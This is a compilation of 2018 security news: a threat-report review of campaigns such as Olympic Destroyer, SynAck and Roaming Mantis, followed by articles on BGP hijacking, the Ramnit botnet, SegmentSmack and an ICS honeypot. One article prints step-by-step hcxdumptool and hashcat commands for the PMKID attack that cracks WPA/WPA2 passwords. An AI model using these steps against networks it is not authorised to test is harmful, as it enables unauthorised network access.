The earlier Olympic Destroyer attacks – designed to destroy and paralyse infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. It’s possible that the new activities are part of another reconnaissance stage that will be followed by a wave of destructive attacks with new motives. This is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware is being used by several groups with different interests. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state threat actors. However, it’s also possible that the financial targets might be another false flag operation by a threat actor that has already shown that they excel at this during their last campaign.

It would be possible to draw certain conclusions about who is behind this campaign, based on the motives and selection of targets. However, it would be easy to make a mistake with only the fragments of the picture that are visible to researchers. The appearance of Olympic Destroyer at the start of this year, with its sophisticated deception efforts, changed the attribution game forever. In our view, it is no longer possible to draw conclusions based on a few attribution vectors discovered during a regular investigation. The response to threats such as Olympic Destroyer should be based on co-operation between the private sector and governments across national borders. Unfortunately, the current geo-political situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

Malware stories
Leaking ads
When we download popular apps with good ratings from official app stores, we assume they are safe. This is partially true, because usually these apps have been developed with security in mind and have been reviewed by the app store’s security team. Recently, we looked at 13 million APKs and discovered that around a quarter of them transmit unencrypted data over the internet. This was unexpected, because most apps were using HTTPS to communicate with their servers. But among the HTTPS requests, there were unencrypted requests to third-party servers. Some of these apps were very popular – in some cases they could boast hundreds of millions of downloads. On further inspection, it became clear that the apps were exposing customer data because of third-party SDKs – with advertising SDKs usually to blame. They collect data so that they can show relevant ads, but often fail to protect that data when sending it to their servers.

In most cases the apps were exposing IMEI, IMSI, Android ID, device information (e.g. manufacturer, model, screen resolution, system version and app name). Some apps were also exposing personal information, mostly the customer’s name, age, gender, phone number, e-mail address and even their income.

Information transmitted over HTTP is sent in plain text, allowing almost anyone to read it. Moreover, there are likely to be several ‘transit points’ en route from the app to the third-party server – devices that receive and store information for a certain period of time. Any network equipment, including your home router, could be vulnerable. If hacked, it will give the attackers access to your data. Some of the device information gathered (specifically IMEI and IMSI numbers) is enough to monitor your further actions. The more complete the information, the more of an open book you are to outsiders — from advertisers to fake friends offering malicious files for download. However, data leakage is only part of the problem. It’s also possible for unencrypted information to be substituted. For example, in response to an HTTP request from an app, the server might return a video ad, which cybercriminals can intercept and replace with a malicious version. Or they might simply change the link inside an ad so that it downloads malware.

You can find the research here, including our advice to developers and consumers.

SynAck targeted ransomware uses the Doppelganging technique
In April 2018, we saw a version of the SynAck ransomware Trojan that employs the Process Doppelganging technique. This technique, first presented in December 2017 at the BlackHat conference, has been used by several threat actors to try and bypass modern security solutions. It involves using NTFS transactions to launch a malicious process from the transacted file so that it looks like a legitimate process.

Malware developers often use custom packers to try and protect their code. In most cases, they can be effortlessly packed to reveal the original Trojan executable so that it can then be analyzed. However, the authors of SynAck obfuscated their code prior to compilation, further complicating the analysis process.

SynAck checks the directory where its executable is started from. If an attempt is made to launch it from an ‘incorrect’ directory, the Trojan simply exits. This is designed to counter automatic sandbox analysis.

The Trojan also checks to see if is being launched on a PC with the keyboard set to a Cyrillic script. If it is, it sleeps for 300 seconds and then exits, to prevent encryption of files belonging to victims from countries where Cyrillic is used.

Like other ransomware, SynAck uses a combination of symmetric and asymmetric encryption algorithms. You can find the details here.

The attacks are highly targeted, with a limited number of attacks observed against targets in the US, Kuwait, Germany and Iran. The ransom demands can be as high as $3,000.

Roaming Mantis
In May we published our analysis of a mobile banking Trojan, Roaming Mantis. We called it this because of its propagation via smartphones roaming between different Wi-Fi networks, although the malware is also known as ‘Moqhao’ and ‘XLoader’. This malicious Android app is spread using DNS hijacking through compromised routers. The victims are redirected to malicious IP addresses used to install malicious apps – called ‘facebook.apk’ and ‘chrome.apk’. The attackers count on the fact that victims are unlikely to be suspicious as long as the browser displays the legitimate URL.

The malware is designed to steal user information, including credentials for two-factor authentication, and give the attackers full control over compromised Android devices. The malware seems to be financially motivated and the low OPSEC suggests that this is the work of cybercriminals.

Our telemetry indicates that the malware was detected more than 6,000 times between February 9 and April 9, although the reports came from just 150 unique victims – some of whom saw the same malware appear again and again on their network. Our research revealed that there were thousands of daily connections to the attackers’ C2 infrastructure.

The malware contains Android application IDs for popular mobile banking and game applications in South Korea. It seems the malicious app was initially targeted at victims in South Korea and this is where the malware was most prevalent. We also saw infections in China, India and Bangladesh.

It’s unclear how the attackers were able to hijack the router settings. If you are concerned about DNS settings on your router, you should check the user manual to verify that your DNS settings haven’t been tampered with, or contact your ISP for support. We would also strongly recommend that you change the default login and password for the admin web interface of the router, don’t install firmware from third-party sources and update the router firmware regularly to prevent similar attacks.

Some clues left behind by the attackers – for example, comments in the HTML source, malware strings and a hardcoded legitimate website – point to Simplified Chinese. So we believe the cybercriminals are familiar with both Simplified Chinese and Korean.

Following our report, we continued to track this campaign. Less than a month later, Roaming Mantis had rapidly expanded its activities to include countries in Europe, the Middle East and beyond, supporting 27 languages in total.

The attackers also extended their activities beyond Android devices. On iOS, Roaming Mantis uses a phishing site to steal the victim’s credentials. When the victim connects to the landing page from an iOS device, they are redirected to fake ‘http://security.apple.com/’ webpage where the attackers steal user ID, password, card number, card expiry date and CVV.

On PCs, Roaming Mantis runs the CoinHive mining script to generate crypto-currency for the attackers – drastically increasing the victim’s CPU usage.

The evasion techniques used by Roaming Mantis have also become more sophisticated. They include a new method of retrieving the C2 by using the e-mail POP protocol, server-side dynamic auto-generation of APK file/filenames and the inclusion of an additional command to potentially assist in identifying research environments.

The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.

If it’s smart, it’s potentially vulnerable
Our many years of experience in researching cyberthreats suggests that if a device is connected to the internet, eventually someone will try to hack it. This includes children’s CCTV cameras, baby monitors, household appliances and even children’s toys.

This also applies to routers – the gateway into a home network. In May, we described four vulnerabilities and hardcoded accounts in the firmware of the D-Link DIR-620 router – this runs on various D-Link routers supplied to customers by one of the biggest ISPs in Russia.

The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data – for example, configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system. The issues were originally identified in firmware version 1.0.37, although some of the discovered vulnerabilities were also identified in other version of the firmware.

You can read the details on the vulnerabilities here.

In May, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities.

Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, they are vulnerable to Man-in-the-Middle (MitM) attacks—intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

GPS trackers have been used successfully in many areas, but using them to track the location of pets is a step beyond their traditional scope of application. For this, they need to be upgraded with new ‘user communication interfaces’ and ‘trained’ to work with cloud services, etc. If security is not properly addressed, user data becomes accessible to intruders, potentially endangering both users and pets.

Some of our researchers recently looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data.

Not only was it possible to work out if the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to determine the moments when a computer password entered with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information.

In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

An MitM extension for Chrome
Many browser extensions make our lives easier, hiding obtrusive advertising, translating text, helping us to choose the goods we want in online stores, etc. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. Then there are extensions whose main aim is to steal money. In the course of our work, we analyse a large number of extensions from different sources. Recently, a particular browser extension caught our eye because it communicated with a suspicious domain.

This extension, named ‘Desbloquear Conteúdo’ (which means ‘Unblock Content’ in Portuguese) targeted customers of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil.

The aim of this malicious extension is to harvest logins and passwords and then steal money from the victims’ bank accounts. Such extensions are quite rare, but they need to be taken seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

By the time we published our report on this malicious extension, it had already been removed from the Chrome Web Store.

The World Cup of fraud
Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events. The FIFA World Cup is no different. Long before anyone kicked a football in Russia, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes.

This included notifications of fake lottery wins, informing recipients that they had won cash in a lottery supposedly held by FIFA or official partners and sponsors.

They typically contain attached documents congratulating the ‘winner’ and asking for personal details such as name, address, e-mail address, telephone number, etc. Sometimes such messages also contain malicious programs, such as banking Trojans.

Sometimes recipients are invited to take part in a ticket giveaway, or they are offered the chance to win a trip to a match. Such messages are sent in the name of FIFA, usually from addresses on recently registered domains. The purpose of such schemes is mainly to update e-mail databases used to distribute more spam.

One of the most popular ways to steal banking and other credentials is to create counterfeit imitations of official partner websites. Partner organizations often arrange ticket giveaways for clients, and attackers exploit this to lure their victims onto fake promotion sites. Such pages look very convincing: they are well-designed, with a working interface, and are hard to distinguish from the real thing. Some fraudsters buy SSL certificates to add further credibility to their fake sites. Cybercriminals are particularly keen to target clients of Visa, the tournament’s commercial sponsor, offering prize giveaways in Visa’s name. To take part, people need to follow a link that points to a phishing site where they are asked to enter their bank card details, including the CVV/CVC code.

Cybercriminals also try to extract data by mimicking official FIFA notifications. The victim is informed that the security system has been updated and all personal data must be re-entered to avoid being locked out. The link in the message takes the victim to a fake account and all the data they enter is harvested by the scammers.

In the run up to the tournament, we also registered a lot of spam advertising soccer-related merchandise, though sometimes the scammers try to sell other things too – for example, pharmaceutical products.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We’ve provided some tips on how to avoid phishing scams – advice that holds good for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points.

More than a fifth of Wi-Fi hotspots use unreliable networks. This means that criminals simply need to be located near an access point to intercept the traffic and get their hands on people’s data. Around three quarters of all access points use WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that holds good wherever you may be – not just at the World Cup.

Snapchat Source Code Leaked
8.8.2018 securityweek  Apple

iOS Update Led to Snapchat Source Code Leak

Hackers obtained some source code for the popular messaging application Snapchat and made it public on GitHub, claiming that they were ignored by the app’s developer.

The source code appears to be for the frontend of Snapchat for iOS. The company behind Snapchat, Snap Inc., has confirmed that the code is genuine by getting GitHub to remove it using a DMCA (Digital Millennium Copyright Act) request.

When users file a DMCA request with GitHub, they are instructed to provide a detailed description of the original copyrighted work that has allegedly been infringed. In this section, a Snap representative wrote, “Snapchat source code. It was leaked and a user has put it in this GitHub repo. There is no URL to point to because Snap Inc. doesn't publish it publicly.”

Snapchat code leaked to GitHub

Snapchat told several news websites that the leak is a result of an iOS update made in May that exposed a “small amount” of its source code. The issue has been addressed and the company says the incident has not compromised its application and had no impact on the Snapchat community.

Messages posted on Twitter by the individuals who appear to be behind the source code leak suggest that they are expecting some sort of “reward” from Snapchat. It’s not uncommon for researchers who find vulnerabilities to quarrel with vendors over the impact or severity of a bug. However, Snapchat appears to be the target of an extortion attempt considering that the hackers say they will continue posting the code.

At least two individuals, allegedly based in Pakistan and France, appear to be involved in the incident. They have been posting messages written in Arabic and English on Twitter.

Snapchat hacker

While Snap says the code posted online has been removed, at least two forks (i.e. copies) exist on GitHub and they suggest that the code has been online since May 24. A few hours before this article was published, the original hackers also re-uploaded the code to GitHub.

Snapchat does have an official bug bounty program powered by HackerOne and the company has been known to award significant rewards for critical vulnerabilities. Last year, two researchers earned a total of $20,000 for finding exposed Jenkins instances that allowed arbitrary code execution and provided access to sensitive data.

Canadian Industrial Security Firm iS5Com Raises $17 Million
8.8.2018 securityweek  IT

iS5 Communications (iS5Com), a Canadian provider of networking and cybersecurity solutions for industrial systems, announced on Tuesday that it has raised roughly $17 million (CDN $22 million) in funding.

iS5Com Raptor

iS5Com RaptorAccording to the company, the funding will be used to enhance its flagship RAPTOR platform and to develop additional solutions for securing critical infrastructure communications and networks.

Designed to protect Smart Cities and various critical infrastructure systems, including those in harsh environments, RAPTOR is compliant with IEC 61850 Ed. 2, IEEE 1613, and EN50155 standards. The flexible platform allows the customers to connect various plug‐in modules to meet functional requirements, the company says.

Additionally, the company says that all of its products have the ability to transmit data efficiently without the loss of any packets under harsh environments and EMI conditions.

Phoenix Contact Innovation Ventures GmbH led the round with participation from new investors, existing shareholders and management.

IBM Opens New Labs for Cracking ATMs, IoT Devices
8.8.2018 securityweek  IoT

IBM’s X-Force Red, a team of veteran hackers focused on finding security vulnerabilities in devices and systems, now has four new labs to work in.

The new network of facilities provides all the toys required for testing the security of consumer and industrial Internet of Things (IoT) technologies, automotive equipment, and Automated Teller Machines (ATMs), both before and after they are deployed to customers.

Referred to as X-Force Red Labs, the new facilities are located in Austin, TX; Hursley, England; Melbourne, Australia; and Atlanta, GA. Additionally, the IBM X-Force Red has launched a dedicated ATM Testing practice.

The IBM X-Force Red team has seen significant growth, experiencing penetration testing client base increase by over 170% in the last year and doubling the number of X-Force Red practitioners across multiple domains.

“IBM X-Force Red has one mission – hack anything to secure everything. Via X-Force Red Labs, we have the ability to do just that, in a secure and controlled environment,” Charles Henderson, Global Managing Partner, IBM X-Force Red, said.

Services provided by IBM X-Force Red through the new four global testing labs include documenting product requirements with product engineers, technical analysis to scope the penetration test, disclosing potential threats and risks to the product and company, creating and implementing a list of security requirements, and actual hacking into products the same as real-world attackers would do.

With over 300 million ATMs globally, finding and addressing vulnerabilities in these systems is one of the key activities the X-Force Red team engages in. According to IBM, it saw a 300% increase in requests for ATM testing, mainly driven by a massive increase in attacks on these devices.

The jackpotting attacks on ATMs, which are performed using both malware and physical access to the machines, have reached the United States as well. With many ATMs running outdated software, cybercriminals attempt to find and exploit vulnerabilities in them for financial gain.

X-Force Red ATM Testing service can help identify and remediate physical, hardware and software vulnerabilities within ATMs before the attackers, IBM says.

The team evaluates the physical, network, application, and computer system security of ATMs, leverages the same tools and methods as criminals do to hack into these machines, helps hardening systems and defenses, and reviews ATM logs to help financial organizations stay in compliance with industry standards.

BGP Hijacking Attacks Target US Payment Processors
8.8.2018 securityweek  Hacking

Several payment processing companies in the United States were targeted recently in BGP hijacking attacks whose goal was to redirect users to malicious websites, Oracle reported last week.

The Border Gateway Protocol (BGP) controls the route of data across the Web. BGP hijacking, also known as prefix or route hijacking, is carried out by taking over IP address groups by corrupting the routing tables that store the path to a network.

In the past months, Oracle, which gained deep visibility into Web traffic after acquiring Dyn in 2016, has observed several instances of malicious actors trying to force users to their websites by targeting authoritative DNS servers in BGP hijacking attacks.

The attackers used rogue DNS servers to return forged DNS responses to users trying to access a certain website. They maximized the duration of an attack with long time-to-live (TTL) values in those forged responses so that DNS servers would hold the fake DNS entries in their cache for an extended period.

“[The] perpetrators showed attention to detail, setting the TTL of the forged response to ~5 days. The normal TTL for the targeted domains was 10 minutes (600 seconds). By configuring a very long TTL, the forged record could persist in the DNS caching layer for an extended period of time, long after the BGP hijack had stopped,” explained Doug Madory, Director of Internet Analysis at Oracle's Internet Intelligence team.

Oracle spotted the first BGP hijacking attempt on July 6, when an Indonesian ISP announced some prefixes associated with Vantiv, a brand owned by US-based payment processing company Worldpay.

The same prefixes were also announced on July 10 by a Malaysian ISP. At the same time, someone hijacked domains associated with Datawire, which is described as a “connectivity service that transports financial transactions securely and reliably over the public Internet to payment processing systems.”

On July 11, someone started hijacking prefixes associated with Mercury Payment Systems, which is also owned by Worldpay. The previously targeted prefixes were then once again hijacked on July 12.

While the initial BGP attacks did not have a significant impact, the last hijacks, which involved Vantiv domains, lasted for nearly three hours, Oracle reported.

A similar attack was seen by the company in April, when cybercriminals attempted to conduct a BGP hijack of Amazon's authoritative DNS service in an effort to redirect users of a cryptocurrency wallet to a fake website set up to steal their money. Evidence suggests that the recent attacks are linked to the ones from April.

Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet
8.8.2018 securityaffairs   BotNet

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, created by Ramnit operators.
Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, that could be the sign of a wider ongoing operation involving the Ramnit operators.

Ramnit is one of the most popular banking malware families in existence today, it was first spotted in 2010 as a worm, in 2011, its authors improved it starting from the leaked Zeus source code turning the malware into a banking Trojan. In 2014 it reached the pinnacle of success, becoming the fourth largest botnet in the world.

In 2015, Europol partnering with several private technology firms announced the takedown of the Ramnit C2 infrastructure.

A few months later Ramnit was back, the researchers at IBM security discovered a new variant of the popular Ramnit Trojan.

Recently the experts observed that the “Black” botnet campaign has infected up 100,000 systems in two months, and this is just the tip of the iceberg because according to researchers a second-stage malware called Ngioweb is already spreading.

There is the concrete risk that Ramnit operators are using the two malware to build a large, multi-purpose proxy botnet that could be used for many fraudulent activities (i.e. DDoS attacks, ransomware-based campaigns, cryptocurrency mining campaigns).

“Recently we discovered the Ramnit C&C server ( which is not related to the previously most prevalent botnet “demetra”. According to domain names which are resolved to the IP address of this C&C server, it pretends to control even old bots, first seen back in 2015. We named this botnet “Black” due to the RC4 key value, “black”, that is used for traffic encryption in this botnet.” reads the analysis published by Checkpoint security.

“This C&C server has actually been active since 6th March 2018 but didn’t attract attention because of the low capacity of the “black” botnet at that time. However, in May-July 2018 we detected a new Ramnit campaign with around 100,000 computers infected.”

According to the experts, in the Black operation, the Ramnit malware is distributed via spam campaigns. The malicious code works as a first-stage malware and it is used to deliver a second-stage malware dubbed Ngioweb.

“Ngioweb represents a multifunctional proxy server which uses its own binary protocol with two layers of encryption,” continues the analysis published by Checkpoint.

“The proxy malware supports back-connect mode, relay mode, IPv4, IPv6 protocols, TCP and UDP transports, with first samples seen in the second half of 2017.”

Ngioweb leverages a two-stage C&C infrastructure, the STAGE-0 C&C server informs the malware about the STAGE-1 C&C server while the unencrypted HTTP connection is used for this purpose. The second STAGE-1 C&C server is used for controlling malware via an encrypted connection.

Ramnit campaign

The Ngioweb malware can operate in two main modes, the Regular back-connect proxy, and the Relay proxy mode.

In a relay proxy mode, the malware allows operators to build chains of proxies and hide their services behind the IP address of a bot.

“The following sequence of actions is used for building a hidden service using the Ngioweb botnet:

Ngioweb Bot-A connects to C&C STAGE-0 and receives command to connect to the server C&C STAGE-1 with address X:6666.
Ngioweb Bot-A connects to C&C STAGE-1 (Server-X) at X:6666. Server-X asks the bot to start the TCP server. Ngioweb bot reports on starting TCP server with IP address and port.
Malware actor publishes the address of the Bot-A in DNS (or using any other public channel).
Another malware Bot-B resolves the address of Bot-A using DNS (or using any other public channel).
Bot-B connects to Bot-A.
Bot-A creates new connection to Server-X and works as relay between Server-X and Bot-B.
Ramnit campaign 3.png

Further details, including the IoC, are reported in the analysis published by Checkpoint.

Hacking WiFi Password in a few steps using a new attack on WPA/WPA2
8.8.2018 securityaffairs   Hacking

A security researcher has devised a new WiFi hacking technique that could be exploited to easily crack WiFi passwords of most modern routers.
The security researcher Jens ‘Atom’ Steube, lead developer of the popular password-cracking tool Hashcat, has devised a new WiFi hacking technique that could be exploited to easily crack WiFi passwords of most modern routers.

The new WiFi hacking technique allows to crack WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled.

The expert was analyzing the recently launched WPA3 security standard when accidentally the new technique.

“This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).” Steube wrote in a post.

“The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.”

Older attack techniques required capturing a full 4-way handshake of Extensible Authentication Protocol over LAN (EAPOL), that is a network port authentication protocol. The new attack technique, differently from the previous ones, targets the Robust Secure Network Information Element (RSN IE).
The RSN protocol was designed for establishing secure communications over an 802.11 wireless network and it is part of the 802.11i (WPA) standard. Every time it attempts to establish a secure communication channel, the RSN broadcasts an RSN IE message within the network.

The Robust Security Network protocol has the PMKID (Pairwise Master Key Identifier), that is the key needed to establish a connection between a client and an access point.

An attacker can obtain the WPA PSK (Pre-Shared Key) password from the PMKID.

The WPA PSK is used in the “Personal” version of WPA and is designed for home and small office networks.

“Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector,” Steube added.

“We receive all the data we need in the first EAPOL frame from the AP.”

Below the description of the technique step by step:

Step 1 — An attacker can use a tool like hcxdumptool (v4.2.0 or higher) to request the PMKID from the targeted access point and dump the received frame to a file.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_statusStep 2 — Run hcxpcaptool tool to convert the captured data from pcapng format to a hash format accepted by hashcat

$ ./hcxpcaptool -z test.16800 test.pcapng

Step 3 — Use Hashcat (v4.2.0 or higher) password cracking tool to obtain the WPA PSK (Pre-Shared Key) password that is the password of the target wireless network.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’The time to crack the password depends on its complexity.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” Steube concluded.

“The main advantages of this attack are as follow:

No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
No more waiting for a complete 4-way handshake between the regular user and the AP
No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
No more eventual invalid passwords sent by the regular user
No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”
If you are searching for a good step by step explanation, give a look at the blog post published by the penetration tester Adam Toscher.

The new attack technique does not work against the recently introduced WPA3 security protocol.

The WPA3 protocol is “much harder to attack because of its modern key establishment protocol called “Simultaneous Authentication of Equals” (SAE).”

SegmentSmack' Flaw in Linux Kernel Allows Remote DoS Attacks
7.8.2018 securityweek  Attack

A vulnerability in the Linux kernel can allow a remote attacker to trigger a denial-of-service (DoS) condition by sending specially crafted packets to the targeted system. The flaw could impact many companies.

The security hole, classified as high severity, has been named SegmentSmack and is tracked as CVE-2018-5390. The issue was discovered by Juha-Matti Tilli of Aalto University and Nokia’s Bell Labs.

The vulnerability exists due to the way versions 4.9 and later of the Linux kernel handle specially crafted TCP packets. Linux kernel developers have released a patch that should address the problem.

“A remote attacker could use this flaw to trigger time and calculation expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions by sending specially modified packets within ongoing TCP sessions which could lead to a CPU saturation and hence a denial of service on the system,” Red Hat explained in an advisory for SegmentSmack. “Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port, thus the attacks cannot be performed using spoofed IP addresses.”

Red Hat says all its products with moderately new Linux kernel versions are affected. The company has not identified any workarounds or mitigations besides the kernel patches.

CERT/CC has also published an advisory for SegmentSmack. The organization believes the vulnerability could impact tens of major vendors, including Amazon, Apple, BlackBerry, Cisco, Dell, Google, HP, IBM, Lenovo, Microsoft and several cybersecurity and networking solutions providers.

Amazon Web Services (AWS) says it has launched an investigation into the impact of the flaw on its products.

“AWS is aware of a recently-disclosed security issue, commonly referred to as SegmentSmack, which affects the TCP processing subsystem of several popular operating systems including Linux,” AWS said. “AWS services are operating normally. We will post a further update as soon as one is available.”

SUSE Linux has also released patches, but the organization says the vulnerability only affects SUSE Linux Enterprise 15.

New Method Discovered for Cracking WPA2 Wi-Fi Passwords
7.8.2018 securityweek  Hacking

Developers of the popular password cracking tool Hashcat have identified a new method that can in some cases be used to obtain a network’s Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2) password.

Jens ‘Atom’ Steube, the lead developer of Hashcat, revealed that the new attack method was discovered by accident during an analysis of the recently launched WPA3 security standard.

According to Steube, the main difference between the new and older attacks is that the new method does not require capturing a full 4-way handshake of Extensible Authentication Protocol over LAN (EAPOL), which is a network port authentication protocol. Instead, the attack targets the Robust Secure Network Information Element (RSN IE).

RSN is a protocol designed for establishing secure communications over an 802.11 wireless network and is part of the 802.11i (WPA) standard. When it begins to establish a secure communication channel, RSN broadcasts an RSN IE message across the network.

One of the capabilities of RSN is PMKID (Pairwise Master Key Identifier), from which an attacker can obtain the WPA PSK (Pre-Shared Key) password. WPA PSK is used in the “Personal” version of WPA and is designed for home and small office networks.

“Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector,” Steube explained in a post on the Hashcat forum. “We receive all the data we need in the first EAPOL frame from the AP.”

An attacker can use the hcxdumptool tool to request the PMKID from the targeted access point and dump the received frame to a file. Hcxdumptool can then be used to obtain a hash of the password that Hashcat can crack. The recommendation is that the tool be run for up to 10 minutes before aborting the process.

“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers),” Steube said.

Penetration tester Adam Toscher has published a blog post explaining step-by-step how such an attack can be conducted. The method has been tested by several individuals and while some claim to have successfully reproduced the attack, others say they haven’t been able to do so.

Some members of the industry pointed out that while this new method can make the attack easier to conduct, brute-forcing is still involved, which means a strong password represents an efficient mitigation. Experts also noted that WPA Enterprise (i.e. systems using WPA2-EAP) is not impacted.

New WPA2 attack method

As for WPA3, Steube noted that it’s “much harder to attack because of its modern key establishment protocol called ‘Simultaneous Authentication of Equals’ (SAE).”

Honeypot Highlights Danger to ICS Systems From Criminal Hackers
7.8.2018 securityweek  ICS

A security firm established a sophisticated honeypot masquerading as a power transmission substation for a major electricity provider. The purpose was to attract attackers and analyze how they operate against the energy sector of the critical infrastructure.

Within two days of going live on June 17, the honeypot developed and operated by Cybereason was found, prepped by a black-market reseller, and sold on in the dark web underworld. xDedic RDP Patch was found in the environment. This is a tool developed by the owners of the xDedic underground forum that allows multiple simultaneous uses of the same RDP credentials. xDedic is a forum that focuses on selling RDP credentials. The initial attacker, notes the report, "also installed backdoors in the honeypot servers by creating additional users, another indicator that the asset was being prepared for sale on xDedic."

On June 27, eight days after the first incursion, a new criminal entity arrived. It was immediately clear, explains Cybereason in a report published today, that this attacker had just one purpose -- to pivot from the IT side of the 'substation' and gain access to the OT environment.

The honeypot had been designed to look like a typical substation: an IT side separated by a firewall from the OT side, comprising the industrial control systems separated from the pumps, monitors, breakers and other hardware elements of the energy provider.

ICS Cyber Security Conference

It was immediately clear that these were attackers with skills beyond script kiddies. "The attackers appear to have been specifically targeting the ICS environment from the moment they got into the environment. They demonstrated non-commodity skills, techniques and a pre-built playbook for pivoting from an IT environment towards an OT environment," said Cybereason CISO Israel Barak.

The attackers showed no interest in anything but the ICS assets. But with access to the ICS devices on the IT side of the environment, the attackers were still denied immediate access to the target OT by the firewall. Blocked by the firewall, the attackers used multipoint network reconnaissance.

"The attackers," reports Cybereason, "moved from the remote server, to the SharePoint server, to the domain controller, to the SQL server to run network scans to determine if one of these assets would allow them to access the ICS environment. Instead of scanning the full network, attackers focused on scanning for assets that would give them access to the HMI and OT computers."

But this was not a nation-state attack. "I would place the attackers in the upper echelon of criminal hackers, just below the expertise of state operators," Ross Rustici, Cybereason's senior director for intelligence services told SecurityWeek. They made mistakes and were too noisy to be the best of the best -- for example, they disabled the security tools on one of the servers, which would present an immediate red flag to the security team.

Cybereason had installed its own platform in the honeypot -- but intentionally in a manner that would make its removal simple. The attackers removed it. The Cybereason platform was re-installed with some hardening, but less than the level recommended by the firm. Again, the attackers were able to disable the hardened version. "After that incident," notes the report, "the platform was installed a third time based on our recommended guidelines and the attackers haven’t been able to deactivate it."

This gives us some insight into the attackers. They were not sufficiently competent to be stealthy, but were not afraid of being discovered. They persisted, even though they would have known that their presence had been detected. This argues against a state actor, who would firstly avoid detection, but then, if detected, most likely silently withdraw.

To be fair, Rustici wasn't expecting a state attacker. "Nation-state attacks against the critical infrastructure of an adversary state are effectively military operations; and military operations are planned with incredible detail," he said. "Such adversaries will be aware of all an energy provider's substations, and while we designed the honeypot sufficient to fool cybercriminals, it would not have withstood the standard reconnaissance and reconnoitering of a military operation."

What this tells us, however, is that the critical infrastructure is a target for standard criminals. The most obvious motivation would be extortion -- taking control of the substation and holding it to ransom. Detection would not be considered important if the endgame of extortion was still possible. But the motivation could also be just for the kudos or even CV-building.

ICS environments are often complex and use a diverse set of control system vendors. Without familiarity of the OT environment and assets, it becomes more challeging for attackers to cause any significant disruption.

